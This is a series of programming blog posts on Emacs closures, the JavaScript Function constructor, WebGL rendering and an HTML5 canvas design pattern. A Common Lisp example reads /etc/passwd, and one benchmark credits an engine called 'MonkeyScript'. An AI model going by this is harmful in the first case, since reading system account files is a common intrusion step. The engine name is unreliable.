The Readable Closures Catch

Since closures are byte-code function objects, they print readably. You can capture an environment in a closure, serialize it, read it back in, and evaluate it. That’s pretty cool! This means closures can be transmitted to other Emacs instances in a multi-processing setup (e.g. Elnode, Async).

The catch is that it’s easy to accidentally capture an unreadable value, especially buffers. Consider this function bar which uses a temporary buffer as an efficient string builder. It returns a closure that returns the result. (Weird, but stick with me here!)

(defun bar (n)
  (with-temp-buffer
    (let ((standard-output (current-buffer)))
      (loop for i from 0 to n do (princ i))
      (let ((string (buffer-string)))
        (lambda () string)))))

The compiled form looks fine,

(bar 3)
;; => #[0 "\300\207" ["0123"] 1]

But the interpreted form of the closure has a problem. The with-temp-buffer macro silently introduced a new binding — an abstraction leak.

(bar 3)
;; => (closure ((string . "0123")
;;              (temp-buffer . #<killed buffer>)
;;              (n . 3) t)
;;      () string)

The temporary buffer is mistakenly captured in the closure, making it unreadable, but only in its uncompiled form. This creates the awkward situation where compiled and uncompiled code have different behavior.

JavaScript Function Metaprogramming

2013-08-17T00:00:00Z

The JavaScript Function constructor is a useful metaprogramming feature of JavaScript. It works like eval, treating the contents of a string as code, but without the quirkiness. The constructor’s API looks like this,

new Function([arg1[, arg2[, ... argN]],] functionBody)

For example, creating a 2-argument add function at run-time,

var add = new Function('x', 'y', 'return x + y');
add(3, 5);  // => 8

In all of the JavaScript engines I’m aware of, functions created this way are fully optimized and JITed just like any other, except that this is done later. The function isn’t established at compile-time but at some point during run-time. The constructor could be implemented in pure JavaScript using eval,

/* Notice: not 100% correct, but close. */
function Function() {
    var args = Array.prototype.slice.call(arguments, 0);
    var body = args.pop();
    return eval('(function(' + args.join(', ') + ') { ' + body + ' })');
}
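One place where the eval version above differs from the real constructor is scope. Functions made by the Function constructor only see the global scope, while a direct eval inside a function sees that function's local variables. A sketch to show the difference, with made-up names, assuming no global variable named secret exists:

```javascript
function makeWithConstructor() {
    var secret = 'local';
    // The new function's body is compiled in the global scope.
    return new Function('return typeof secret');
}

function makeWithEval() {
    var secret = 'local';
    // Direct eval closes over the surrounding local scope.
    return eval('(function() { return typeof secret; })');
}

makeWithConstructor()();  // => "undefined"
makeWithEval()();         // => "string"
```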

Constructor Misuse

Misusing the Function constructor has the risk that you may invoke compilation repeatedly. For example, both of these functions return an array of adder functions.

function literal() {
    var out = [];
    for (var i = 0; i < 10; i++) {
        out.push(function(x, y) { return x + y; });
    }
    return out;
}

function constructor() {
    var out = [];
    for (var i = 0; i < 10; i++) {
        out.push(new Function('x', 'y', 'return x + y'));
    }
    return out;
}

The literal function creates 10 unique closure objects.

var x = literal();
x[0] === x[1];  // => false

While these appear to be unique objects, they’re all backed by the same code in memory. Since the function has no free variables, it doesn’t actually capture anything. These closures are really just empty handles to the same function. This function will be recognized and compiled ahead of time before literal is ever executed.

On the other hand, short of any serious optimization magic, the constructor function version of this creates 10 unique backing functions, invoking the compiler for each one individually at run-time. If they’re used enough to warrant it, each will also be optimized separately. This is a misuse of the Function constructor, as bad as misusing eval.
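If the constructor really must be called from a loop, one possible mitigation is to cache by source text so that each distinct body is compiled only once. This is a sketch, not something from the original code. The names cache and binary are hypothetical, and it only handles two-argument functions.

```javascript
// Hypothetical cache: source text -> compiled function.
var cache = Object.create(null);

// Return a function of (x, y) with the given body, compiling it only
// the first time that body is seen.
function binary(body) {
    if (!(body in cache)) {
        cache[body] = new Function('x', 'y', body);
    }
    return cache[body];
}

var a = binary('return x + y');
var b = binary('return x + y');
a === b;  // => true
a(3, 5);  // => 8
```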

What’s it for?

As stated before, the Function constructor is useful for metaprogramming. Use it to generate source code programmatically. For example, this function generates 64 new functions by assembling source code from strings.

function opfuncs() {
    var ops = ['+', '-', '*', '/'];
    var names = ['a', 's', 'm', 'd'];
    var funcs = {};
    for (var i = 0; i < ops.length; i++) {
        for (var j = 0; j < ops.length; j++) {
            for (var k = 0; k < ops.length; k++) {
                var name = names[i] + names[j] + names[k],
                    body = ['w', ops[i], 'x', ops[j], 'y', ops[k], 'z'];
                funcs[name] = new Function('w', 'x', 'y', 'z',
                                           'return ' + body.join(''));
            }
        }
    }
    return funcs;
}

Writing out all these functions explicitly would take 66 lines of code instead of just 16, and it would be error-prone and more difficult to maintain. Metaprogramming is a win here.

/* Ugh ... */
var opfuncs = {
    aaa: function(w, x, y, z) { return w + x + y + z; },
    aas: function(w, x, y, z) { return w + x + y - z; },
    /* ... */
    ddd: function(w, x, y, z) { return w / x / y / z; }
};

The opfuncs function should be called exactly once. These functions shouldn’t be generated multiple times because the benefits of the metaprogramming approach would be lost. To ensure that, I’m replacing the function with its result in this example,

opfuncs = opfuncs();
opfuncs.aaa(2,3,4,5); // 2+3+4+5 => 14
opfuncs.ama(2,3,4,5); // 2+3*4+5 => 19

The final metaprogrammed opfuncs object should be completely indistinguishable from the longer, explicit version.

The Design Flaw

The primary flaw with the Function constructor is that it’s variadic. The whole purpose of this constructor is to dynamically generate functions at run-time, but there’s (generally) no straightforward way to call a constructor with a variable number of arguments. The apply method can’t directly compose with new.

Say we want to write a version of opfuncs where, rather than generate 64 4-argument functions, it generates 4^(n-1) n-argument functions, taking an argument n. Now new Function needs to be applied to a variable number of arguments (n + 1).

If rather than take argument names as individual arguments, Function took them as an array, this would be straightforward. It would be like having apply built-in. This is how I would have designed Function to work.

new Function(argNames, functionBody)

Used like this,

var add = new Function(['x', 'y'], 'return x + y');

Fortunately there’s a simple workaround. The built-in constructors do something useful for the most part when used without new. My personal favorite is the Boolean constructor. Without new it returns a primitive boolean based on the truthiness of its argument. It can be used to remove falsy values from an array.

[1, '', 'foo', 0, null].filter(Boolean);
// => [1, "foo"]

In the case of Function, new isn’t actually needed at all! This way, apply can be used with the constructor. This works as expected,

var add = Function.apply(null, ['x', 'y', 'return x + y']);

Here it is being used to generate functions of n arguments.

/** Return a function of n-args that sums its arguments. */
function addN(n) {
    var args = [];
    for (var i = 0; i < n; i++) {
        args.push('a' + i);
    }
    args.push('return ' + args.join(' + '));
    return Function.apply(null, args);
}

addN(5)(3, 4, 5, 6, 7);  // => 25
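
The same trick covers the generalized opfuncs described earlier. Here is a rough sketch, not a polished implementation: the name opfuncsN and the parameter names p0, p1, ... are made up for illustration, and n is assumed to be at least 1. Each function is identified by an (n-1)-digit base-4 number, one digit per operator.

```javascript
/** Return all 4^(n-1) functions of n arguments, keyed by operator names. */
function opfuncsN(n) {
    var ops = ['+', '-', '*', '/'];
    var names = ['a', 's', 'm', 'd'];
    var params = [];
    for (var i = 0; i < n; i++) {
        params.push('p' + i);
    }
    var funcs = {};
    var count = Math.pow(ops.length, n - 1);
    for (var c = 0; c < count; c++) {
        // Peel base-4 digits off c, filling operator slots right to left.
        var name = '', tail = '', digits = c;
        for (var k = n - 1; k >= 1; k--) {
            var pick = digits % ops.length;
            digits = Math.floor(digits / ops.length);
            name = names[pick] + name;
            tail = ' ' + ops[pick] + ' ' + params[k] + tail;
        }
        var body = 'return ' + params[0] + tail;
        // No "new" needed, so apply handles the variable argument count.
        funcs[name] = Function.apply(null, params.concat(body));
    }
    return funcs;
}

opfuncsN(4).ama(2, 3, 4, 5);      // 2 + 3 * 4 + 5 => 19
Object.keys(opfuncsN(3)).length;  // => 16
```

With n = 4 this should produce the same 64 functions, under the same names, as the original opfuncs.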

A single variadic function that uses the arguments special variable to sum its arguments could be used in place of these individual functions, but generating a function with a specific arity and using it many times will have much better performance than the variadic version.

function add() {
    var sum = 0;
    for (var i = 0; i < arguments.length; i++) {
        sum += arguments[i];
    }
    return sum;
}

function test(f, n) {
    var start = Date.now();
    for (var i = 0; i < n; i++) {
        f(3, 4, 5, 6, 7);
    }
    return (Date.now() - start) / 1000;
}

test(add,     10000000);  // => 0.698 seconds
test(addN(5), 10000000);  // => 0.152 seconds

In MonkeyScript, the metaprogramming approach is almost 5 times faster.

Liquid Simulation in WebGL

2013-06-26T00:00:00Z

Over a year ago I implemented a liquid simulation using Box2D and Java 2D. It’s a neat trick that involves simulating a bunch of balls in a container, blurring the rendering of this simulation, and finally thresholding the blurred rendering. Due to my recent affection for WebGL, this week I ported the whole thing to JavaScript and WebGL.

nullprogram.com/fun-liquid/webgl/

Unlike the previous Java version, blurring and thresholding are performed entirely on the GPU. It should therefore be less CPU intensive and a lot more GPU intensive. Assuming a decent GPU, it will run at a (fixed) 60 FPS, as opposed to the mere 30 FPS I could squeeze out of the old version. Other than this, the JavaScript version should look pretty much identical to the Java version.

Box2D performance

I ran into a few complications while porting. The first was the performance of Box2D. I started out by using box2dweb, which is a port of Box2DFlash, which is itself a port of Box2D. Even on V8, the performance was poor enough that I couldn’t simulate enough balls to achieve the liquid effect. The original JBox2D version handles 400 balls just fine while this one was struggling to do about 40.

Brian suggested I try out the Box2D emscripten port. Rather than manually port Box2D to JavaScript, emscripten compiles the original C++ to JavaScript via LLVM, being so direct as to even maintain its own heap. The benefit is much better performance, but the cost is a difficult API. Interacting with emscripten-compiled code can be rather cumbersome, and this emscripten port isn’t yet fully worked out. For example, creating a PolygonShape object involves allocating an array on the emscripten heap and manipulating a pointer-like thing. And when you screw up, the error messages are completely unhelpful.

Moving to this other version of Box2D allowed me to increase the number of balls to about 150, which is just enough to pull off the effect. I’m still a bit surprised how slow this is. The computational complexity for this is something like O(n^2), so 150 is a long way behind 400: roughly one seventh of the pairwise work. I may revisit this in the future to try to get better performance by crafting my own very specialized physics engine from scratch.

WebGL complexity

Before I even got into writing the WebGL component of this, I implemented a 2D canvas display, without any blurring, just for getting Box2D tuned. If you visit the demonstration page without a WebGL-capable browser you’ll see this plain canvas display.

Getting WebGL to do the same thing was very simple. I used GL_POINTS to draw the balls just like I had done with the sphere demo. To do blurring I would need to render this first stage onto an intermediate framebuffer, then using this framebuffer as an input texture I would blur and threshold this into the default framebuffer.

This actually took me a while to work out, much longer than I had anticipated. To prepare this intermediate framebuffer you must first create and configure a texture. Then create and configure a renderbuffer to fill in as the depth buffer. Then finally create the framebuffer and attach both of these to it. Skip any step and all you get are some vague WebGL warnings. (With regular OpenGL it’s worse, since you get no automatic warnings at all.)
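
The three steps look roughly like the following. This is a sketch under assumptions rather than the demo's actual code: the function name createRenderTarget and the shape of the returned object are invented here, and the filtering and wrapping choices are just one reasonable configuration. The gl calls themselves are standard WebGL 1.

```javascript
// `gl` is a WebGLRenderingContext; width and height size the off-screen target.
function createRenderTarget(gl, width, height) {
    // 1. Create and configure the texture that receives the color output.
    var texture = gl.createTexture();
    gl.bindTexture(gl.TEXTURE_2D, texture);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.LINEAR);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.LINEAR);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_S, gl.CLAMP_TO_EDGE);
    gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_WRAP_T, gl.CLAMP_TO_EDGE);
    gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, width, height, 0,
                  gl.RGBA, gl.UNSIGNED_BYTE, null);

    // 2. Create and configure the renderbuffer that serves as depth buffer.
    var depth = gl.createRenderbuffer();
    gl.bindRenderbuffer(gl.RENDERBUFFER, depth);
    gl.renderbufferStorage(gl.RENDERBUFFER, gl.DEPTH_COMPONENT16,
                           width, height);

    // 3. Create the framebuffer and attach both of them to it.
    var framebuffer = gl.createFramebuffer();
    gl.bindFramebuffer(gl.FRAMEBUFFER, framebuffer);
    gl.framebufferTexture2D(gl.FRAMEBUFFER, gl.COLOR_ATTACHMENT0,
                            gl.TEXTURE_2D, texture, 0);
    gl.framebufferRenderbuffer(gl.FRAMEBUFFER, gl.DEPTH_ATTACHMENT,
                               gl.RENDERBUFFER, depth);
    var status = gl.checkFramebufferStatus(gl.FRAMEBUFFER);

    // Switch back to the default framebuffer before reporting problems.
    gl.bindFramebuffer(gl.FRAMEBUFFER, null);
    if (status !== gl.FRAMEBUFFER_COMPLETE) {
        throw new Error('incomplete framebuffer: ' + status);
    }
    return {framebuffer: framebuffer, texture: texture, depth: depth};
}
```

Checking the status explicitly turns a skipped step into an immediate error instead of a vague warning later on.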

WebGL textures must have dimensions that are powers of two. However, my final output does not. Carefully rendering onto a texture with a different aspect ratio and properly sampling the results back off introduces an intermediate coordinate system which mucks things up a bit. It took me some time to wrap my head around it to work everything out.
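
One way to tame that intermediate coordinate system, and not necessarily the one the demo uses, is to pad the texture up to the next power of two and remember what fraction of it the image occupies. The helper names below are hypothetical.

```javascript
// Smallest power of two that is >= n (for n >= 1).
function nextPowerOfTwo(n) {
    var p = 1;
    while (p < n) {
        p *= 2;
    }
    return p;
}

// Size a texture to hold a width x height image. Multiplying a 0..1 image
// coordinate by scaleX / scaleY gives the matching texture coordinate.
function textureLayout(width, height) {
    var tw = nextPowerOfTwo(width);
    var th = nextPowerOfTwo(height);
    return {
        width: tw,
        height: th,
        scaleX: width / tw,
        scaleY: height / th
    };
}

textureLayout(800, 600);
// => {width: 1024, height: 1024, scaleX: 0.78125, scaleY: 0.5859375}
```

The two scale factors would then be passed to the second-stage shader (as a uniform, say) so that it samples only the occupied region.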

Finally, once I was nearly done, my fancy new shader was consistently causing OpenGL to crash, taking my browser down with it. I had to switch to a different computer to continue developing.

The GPU as a bottleneck

For the second time since I’ve picked up WebGL I have overestimated graphics cards’ performance capabilities. It turns out my CPU is faster at convolving a 25x25 kernel (the size of the convolution kernel in the Java version) than any GPU that I have access to. If I reduce the size of the kernel the GPU gets its edge back. The only way to come close to 25x25 on the GPU is to cut some corners. I finally settled on a 19x19 kernel, which seems to work just about as well without being horribly slow. I may revisit this in the future so that lower-end GPUs can run this at 60 FPS as well.

Conclusion

I’m really happy with the results, and writing this has been a good exercise in OpenGL. I completely met one of my original goals: to look practically identical to the original Java version. I mostly met my second, performance goal. On my nice desktop computer it runs more than twice as fast, but, unfortunately, it’s very slow on my tablet. If I revisit this project in the future, the purpose will be to optimize for these lower-end, mobile devices.

This project has also been a useful testbed for a low-level WebGL wrapper library I’m working on called Igloo, which I’ll cover in a future post.

An HTML5 Canvas Design Pattern

2013-06-16T00:00:00Z

I’ve been falling into a particular design pattern when using the HTML5 Canvas element. By “design pattern” I don’t mean some pretty arrangement but rather a software design pattern. This one’s a very Lisp-like pattern, and I wonder if I would have come up with it if I hadn’t first seen it in Lisp. It can also be applied to the Java 2D API, though less elegantly.

First, a review.

Drawing Basics

A canvas is just another element in the page.

<canvas id="display" width="200" height="200"></canvas>

To draw onto it, get a context and call drawing methods on it.

var ctx = document.getElementById('display').getContext('2d');
ctx.fillStyle = 'blue';
ctx.beginPath();
ctx.arc(100, 100, 75, 0, Math.PI * 3 / 2);
ctx.fill();

This will result in a canvas that looks like this,

Here’s how to do the same thing with Java 2D. Very similar, except the canvas is called a JComponent and the context is called a Graphics2D. As you could imagine from this example, the Java 2D API is much richer and more object-oriented than the Canvas API. The cast from Graphics to Graphics2D is required due to legacy.

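import java.awt.Color;
import java.awt.Graphics;
import java.awt.Graphics2D;
import java.awt.geom.Arc2D;
import javax.swing.JComponent;

public class Example extends JComponent {
    public void paintComponent(Graphics graphics) {
        Graphics2D g = (Graphics2D) graphics;
        g.setColor(Color.BLUE);
        g.fill(new Arc2D.Float(25, 25, 150, 150, 0, 360, Arc2D.CHORD));
    }
}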

An important feature of both is the ability to globally apply transforms — translate, scale, shear, and rotate — to all drawing commands. For example, drawings on the canvas can be vertically scaled using the scale() method. Graphics2D also has a scale() method.

// ...
ctx.scale(1, 0.5);
// ...

For both JavaScript and Java the rendered image isn’t being stretched. Instead, the input vertices are being transformed before rendering to pixels. This is what makes it possible to decouple the screen coordinate system from the program’s internal coordinate system. Outside of rare performance concerns, the program’s internal logic shouldn’t be written in terms of pixels. It should rely on these transforms to convert between coordinate systems at rendering time, allowing for a moving camera.

The Transform Stack

Both cases also allow the current transform to be captured and restored. Not only does this make it easier for a function to clean up after itself and properly share the canvas with other functions, but also multiple different coordinate transforms can be stacked on top of each other. For example, the bottom transform might convert between internal coordinates and screen coordinates. When it comes time to draw a minimap, another transform can be pushed on top and the same exact drawing methods applied to the canvas.

This is where Canvas and Java 2D start to differ. Both got some aspect right and some aspect wrong, and I wish I could easily have the best of both.

In canvas, this is literally a stack, and there is a pair of methods, save() and restore(), for pushing and popping the transform matrix on an internal stack. The above JavaScript example may be in a function that is called more than once, so it should restore the transform matrix before returning.

ctx.save();
ctx.scale(1, 0.5);
// ... draw ...
ctx.restore();

In Java this stack is managed manually, and it (typically) sits inside the call stack itself as a variable.

AffineTransform tf = g.getTransform();
g.scale(1, 0.5);
// ... draw ...
g.setTransform(tf);

I think Canvas’s built-in stack is more elegant than managing an extraneous variable and object. However, what’s significant about Java 2D is that we actually have access to the transform matrix. It’s that AffineTransform object. The Canvas transform matrix is an internal, inaccessible data structure. It has an established external representation, SVGMatrix, but it won’t provide a copy. If one of these is needed, a separate matrix must be maintained in parallel. What a pain!

Why would we need the transform matrix? So that we can transform coordinates in reverse! When a user interacts with the display, the program receives screen coordinates. To be useful, these need to be converted into internal coordinates so that the program can determine where in the world the user clicked. The Java AffineTransform class has a createInverse() method for computing this inverse transform. This is something I really miss having when using Canvas. It’s such an odd omission.
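
Here is roughly what maintaining that parallel matrix could look like. It is a minimal sketch: the Affine type and its method names are invented for illustration, and the six fields follow the argument order of ctx.setTransform(a, b, c, d, e, f).

```javascript
// A 2D affine transform:
//   x' = a*x + c*y + e
//   y' = b*x + d*y + f
function Affine(a, b, c, d, e, f) {
    this.a = a; this.b = b; this.c = c;
    this.d = d; this.e = e; this.f = f;
}

// Map a point through the transform (internal -> screen coordinates).
Affine.prototype.transformPoint = function(x, y) {
    return {
        x: this.a * x + this.c * y + this.e,
        y: this.b * x + this.d * y + this.f
    };
};

// Compute the inverse transform (screen -> internal coordinates).
Affine.prototype.inverse = function() {
    var det = this.a * this.d - this.b * this.c;
    if (det === 0) {
        throw new Error('transform is not invertible');
    }
    var a = this.d / det, b = -this.b / det;
    var c = -this.c / det, d = this.a / det;
    return new Affine(a, b, c, d,
                      -(a * this.e + c * this.f),
                      -(b * this.e + d * this.f));
};

// Scale by (2, 0.5), then translate by (100, 50).
var camera = new Affine(2, 0, 0, 0.5, 100, 50);
camera.inverse().transformPoint(140, 60);  // => {x: 20, y: 20}
```

The same six numbers can be handed to ctx.setTransform() before drawing, so the canvas and the program agree on the mapping, and a click at screen position (140, 60) resolves to (20, 20) in internal coordinates.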

The Design Pattern

So, back to the design pattern. When it comes time to draw something, a transform is established on the context, something is drawn to the context, then finally the transform is removed. The word “finally” should stand out here. If we’re being careful, we should put the teardown step inside a finally block. If something goes wrong, the context will be left in a clean state. This has personally helped me in debugging.

ctx.save();
ctx.scale(1, 0.5);
try {
    // ... draw ...
} finally {
    ctx.restore();
}

In Lisp, this pattern is typically captured as a with- macro.

Perform setup
Run body
Teardown
Return the body’s return value

Instead of finally, the special form unwind-protect is used to clean up regardless of any error condition. Here’s a simplified version of Emacs’ with-temp-buffer macro, which itself is built on another with- macro, with-current-buffer.

(defmacro with-temp-buffer (&rest body)
  `(let ((temp-buffer (generate-new-buffer " *temp*")))
     (with-current-buffer temp-buffer
       (unwind-protect
           (progn ,@body)
         (kill-buffer temp-buffer)))))

The setup is to create a new buffer and switch to it. The teardown destroys the buffer, regardless of what happens in the body. An example from Common Lisp would be with-open-file.

(with-open-file (stream "/etc/passwd")
  (loop while (listen stream)
     collect (read-line stream)))

This macro ensures that the stream is closed when the body exits, no matter what. (Side note: this can be very surprising when combined with Clojure’s laziness!)

There are no macros in JavaScript, let alone Lisp’s powerful macro system, but the pattern can still be captured using closures. Replace the body with a callback.

function Transform() {
    // ...
}

// ...

Transform.prototype.withDraw = function(ctx, callback) {
    ctx.save();
    this.applyTransform(ctx);
    try {
        callback();
    } finally {
        ctx.restore();
    }
};

The callback is called once the context is in the proper state. Here’s how it would be used.

var transform = new Transform().scale(1, 0.5);  // (fluent API)

function render(step) {
    transform.withDraw(ctx, function() {
        // ... draw ...
    });
}

Since JavaScript has proper closures, that step variable is completely available to the callback. This function-as-body pattern comes up a lot (e.g. AMD), and seeing it work so well makes me think of JavaScript as a “suitable Lisp.”
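
The Lisp with- macros also return the body’s value. A variation on the pattern that does the same might look like this sketch. The name withSaved is hypothetical, and it only assumes a context object with save() and restore() methods.

```javascript
// Run body with the context state saved, restoring it afterwards no
// matter how body exits. Returns whatever body returns.
function withSaved(ctx, body) {
    ctx.save();
    try {
        return body();
    } finally {
        ctx.restore();
    }
}
```

A caller could then write something like var width = withSaved(ctx, function() { return ctx.measureText(label).width; }) and still be sure the context is restored afterwards.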

Java can just barely pull off the pattern using anonymous classes, but it’s very clunky.

class Transform {
    // ...

    AffineTransform transform;

    public void withDraw(Graphics2D g, Runnable callback) {
        AffineTransform original = g.getTransform();
        g.transform(transform);
        try {
            callback.run();
        } finally {
            g.setTransform(original);
        }
    }
}

class Foo {
    // ...

    Transform transform;

    public void render(Graphics2D g, double step) {
        transform.withDraw(g, new Runnable() {
            public void run() {
                // ... draw ...
            }
        });
    }
}

Java’s anonymous classes are closures, but, unlike Lisp and JavaScript, they close over values rather than bindings. Purely in an attempt to hide this complexity, Java requires that variables accessed from the anonymous class be declared as final. It’s awkward and confusing enough that I probably wouldn’t try to apply it in Java.
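
For contrast, here is a small JavaScript illustration of closing over a binding rather than a value. The names are made up for the example. Both functions share the same count variable, so an assignment made through one is visible through the other.

```javascript
function makeCounter() {
    var count = 0;
    return {
        increment: function() { count++; },    // assigns to the shared binding
        read: function() { return count; }     // sees the updated value
    };
}

var counter = makeCounter();
counter.increment();
counter.increment();
counter.read();  // => 2
```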

I think this pattern works very well with JavaScript, and if you dig around in some of my graphical JavaScript you’ll see that I’ve already put it to use. JavaScript functions work pretty well as a stand in for some kinds of Lisp macros.

Long Live WebGL

2013-06-10T00:00:00Z

On several occasions over the last few years I’ve tried to get into OpenGL programming. I’d sink an afternoon into attempting to learn it, only to get frustrated and quit without learning much. There’s a lot of outdated and downright poor information out there, and a beginner can’t tell the good from the bad. I tried using OpenGL from C++, then Java (lwjgl), then finally JavaScript (WebGL). This last one is what finally stuck, unlocking a new world of projects for me. It’s been very empowering!

I’ll explain why WebGL is what finally made OpenGL click for me.

Old vs. New

I may get a few details wrong, but here’s the gist of it.

Currently there are basically two ways to use OpenGL: the old way (compatibility profile, fixed-function pipeline) and the new way (core profile, programmable pipeline). The new API came about because of a specific new capability that graphics cards gained years after the original OpenGL specification was written. That is, modern graphics cards are fully programmable. Programs can be compiled with the GPU hardware as the target, allowing them to run directly on the graphics card. The new API is oriented around running these programs on the graphics card.

Before the programmable pipeline, graphics cards had a fixed set of functionality for rendering 3D graphics. You tell it what functionality you want to use, then hand it data little bits at a time. Any functionality not provided by the GPU had to be done on the CPU. The CPU ends up doing a lot of the work that would be better suited for a GPU, in addition to spoon-feeding data to the GPU during rendering.

With the programmable pipeline, you start by sending a program, called a shader, to the GPU. At the application’s run-time, the graphics driver takes care of compiling this shader, which is written in the OpenGL Shading Language (GLSL). When it comes time to render a frame, you prepare all the shader’s inputs in memory buffers on the GPU, then issue a draw command to the GPU. The program output goes into another buffer, probably to be treated as pixels for the screen. On its own, the GPU processes the inputs in parallel much faster than a CPU could ever do sequentially.

A very important detail to notice here is that, at a high level, this process is almost orthogonal to the concept of rendering graphics. The inputs to a shader are arbitrary data. The final output is arbitrary data. The process is structured so that it’s easily used to render graphics, but it’s not strictly required. It can be used to perform arbitrary computations.

This paradigm shift in GPU architecture is the biggest barrier to learning OpenGL. The apparent surface area of the API is doubled in size because it includes the irrelevant, outdated parts. Sure, the recent versions of OpenGL eschew the fixed-function API (3.1+), but all of that mess still shows up when browsing and searching documentation. Worse, there are still many tutorials that teach the outdated API. In fact, as of this writing the first Google result for “opengl tutorial” turns up one of these outdated tutorials.

OpenGL ES and WebGL

OpenGL for Embedded Systems (OpenGL ES) is a subset of OpenGL specifically designed for devices like smartphones and tablet computers. The OpenGL ES 2.0 specification removes the old fixed-function APIs. What’s significant about this is that WebGL is based on OpenGL ES 2.0. If the context of a discussion is WebGL, you’re guaranteed to not be talking about an outdated API. This indicator has been a really handy way to filter out a lot of bad information.

In fact, I think the WebGL specification is probably the best documentation root for exploring OpenGL. None of the outdated functions are listed, most of the descriptions are written in plain English, and they all link out to the official documentation if clarification or elaboration is needed. As I was learning WebGL it was easy to jump around this document to find what I needed.

This is also a reason to completely avoid spending time learning the fixed-function pipeline. It’s incompatible with WebGL and many modern platforms. Learning it would be about as useful as learning Latin when your goal is to communicate with people from other parts of the world.

The Fundamentals

Now that WebGL allowed me to focus on the relevant parts of OpenGL, I was able to put effort into figuring out the important stuff that the tutorials skip over. You see, even the tutorials that are using the right pipeline still do a poor job. They skip over the fundamentals and dive right into 3D graphics. This is a mistake.

I’m a firm believer that mastery lies in having a solid grip on the fundamentals. The programmable pipeline has little built-in support for 3D graphics. This is because OpenGL is at its essence a 2D API. The vertex shader accepts something as input and it produces 2D vertices in device coordinates (-1 to 1) as output. Projecting this something to 2D is functionality you have to do yourself, because OpenGL won’t be doing it for you. Realizing this one fact was what really made everything click for me.
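
To make “do it yourself” concrete, here is a sketch of a bare-bones perspective projection, written in JavaScript rather than GLSL for readability. The setup is an assumption for illustration: a camera at the origin looking down the negative z axis, with fov (in radians) and aspect (width divided by height) as made-up parameters.

```javascript
// Project a 3D point onto 2D device coordinates (-1 to 1 when visible).
function project(point, fov, aspect) {
    var f = 1 / Math.tan(fov / 2);
    var depth = -point.z;       // distance in front of the camera
    if (depth <= 0) {
        return null;            // behind the camera: nothing to draw
    }
    return {
        x: (f / aspect) * point.x / depth,
        y: f * point.y / depth
    };
}

// With a 90 degree field of view, a point at (1, 1, -2) lands
// approximately halfway between the center and the corner: (0.5, 0.5).
project({x: 1, y: 1, z: -2}, Math.PI / 2, 1);
```

The divide by depth is what makes distant objects smaller. In a vertex shader the same arithmetic would run once per vertex on the GPU.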

Many of the tutorials try to handwave this part. “Just use this library and this boilerplate so you can ignore this part,” they say, quickly moving on to spinning a cube. This is sort of like using an IDE for programming and having no idea how a build system works. This works if you’re in a hurry to accomplish a specific task, but it’s no way to achieve mastery.

More so, for me the step being skipped is perhaps the most interesting part of it all! For example, after getting a handle on how things worked, without copy-pasting any boilerplate around, I ported my OpenCL 3D Perlin noise generator to GLSL.

/perlin-noise/ (source)

Instead of saving off each frame as an image, this just displays it in real-time. The CPU’s only job is to ask the GPU to render a new frame at a regular interval. Other than this, it’s entirely idle. All the computation is being done by the GPU, and at speeds far greater than a CPU could achieve.

Side note: you may notice some patterns in the noise. This is because, as of this writing, I’m still working out decent random number generation in the fragment shader.

If your computer is struggling to display that page it’s because the WebGL context is demanding more from your GPU than it can deliver. All this GPU power is being put to use for something other than 3D graphics! I think that’s far more interesting than a spinning 3D cube.

Spinning 3D Sphere

However, speaking of 3D cubes, this sort of thing was actually my very first WebGL project. To demonstrate the biased-random-point-on-a-sphere thing to a co-worker (outside of work), I wrote a 3D HTML5 canvas plotter. I didn’t know WebGL yet.

HTML5 Canvas 2D version (source) (ignore the warning)

On a typical computer this can only handle about 4,000 points before the framerate drops. In my effort to finally learn WebGL, I ported the display to WebGL and GLSL. Remember that you have to bring your own 3D projection to OpenGL? Since I had already worked all of that out for the 2D canvas, this was just a straightforward port to GLSL. Except for the colored axes, this looks identical to the 2D canvas version.

WebGL version (a red warning means it’s not working right!)

This version can literally handle millions of points without breaking a sweat. The difference is dramatic. Here’s 100,000 points in each (any more points and it’s just a black sphere).

A Friendly API

WebGL still has three major advantages over other OpenGL bindings, all of which make it a real joy to use.

Length Parameters

In the C/C++ world, where the OpenGL specification lies, any function that accepts an arbitrary-length buffer must also have a parameter for the buffer’s size. Due to this, these functions tend to have a lot of parameters! So in addition to OpenGL’s existing clunkiness there are these length arguments to worry about.

Not so in WebGL! Since JavaScript is a type-safe language, the buffer lengths are stored with the buffers themselves, so this parameter completely disappears. This is also an advantage of Java’s lwjgl.

Resource Management

Any time a shader, program, buffer, etc. is created, resources are claimed on the GPU. Long running programs need to manage these properly, destroying them before losing the handle on them. Otherwise it’s a GPU leak.

WebGL ties GPU resource management to JavaScript’s garbage collector. If a buffer is created and then let go, the GPU’s associated resources will be freed at the same time as the wrapper object in JavaScript. This can still be done explicitly if tight management is needed, but the GC fallback is there if it’s not done.

Because this is untrusted code interacting with the GPU, this part is essential for security reasons. JavaScript programs can’t leak GPU resources, even intentionally.

Unlike the buffer length advantage, lwjgl does not do this. You still need to manage GPU resources manually in Java, just as you would in C.

Live Interaction

Perhaps most significantly of all, I can drive WebGL interactively with Skewer. If I expose shader initialization properly, I can even update the shaders while the display is running. Before WebGL, live OpenGL interaction is something that could only be achieved with the Common Lisp OpenGL bindings (as far as I know).

It’s really cool to be able to manipulate an OpenGL context from Emacs.

The Future

I’m expecting to do a lot more with WebGL in the future. I’m really keeping my eye out for an opportunity to combine it with distributed web computing, but using the GPU instead of the CPU. If I find a problem that fits this infrastructure well, this system may be the first of its kind: visit a web page and let it use your GPU to help solve some distributed computing problem!

Skewer Gets HTML Interaction

2013-06-01T00:00:00Z

A month ago Zane Ashby made a pull request that added another minor mode to Skewer: skewer-html-mode. It’s analogous to the skewer-css minor mode in that it evaluates HTML “expressions” in the context of the current page. The original pull request was mostly a proof of concept, with evaluated HTML snippets being appended to the end of the page (body) unless a target selector is manually specified.

This mode is still a bit rough around the edges, but since I think it’s useful enough for productive work I’ve merged it in.

Replacing HTML

Unsatisfied with just appending content, I ran with the idea and updated it to automatically replace structurally-matching content on the page when possible. Zane’s fundamental idea remained intact: a CSS selector is sent to the browser along with the HTML. Skewer running in the browser uses querySelector() to find the relevant part of the document and replaces it with the provided HTML. This is done with the command skewer-html-eval-tag (default: C-M-x), which selects the innermost tag enclosing the point.

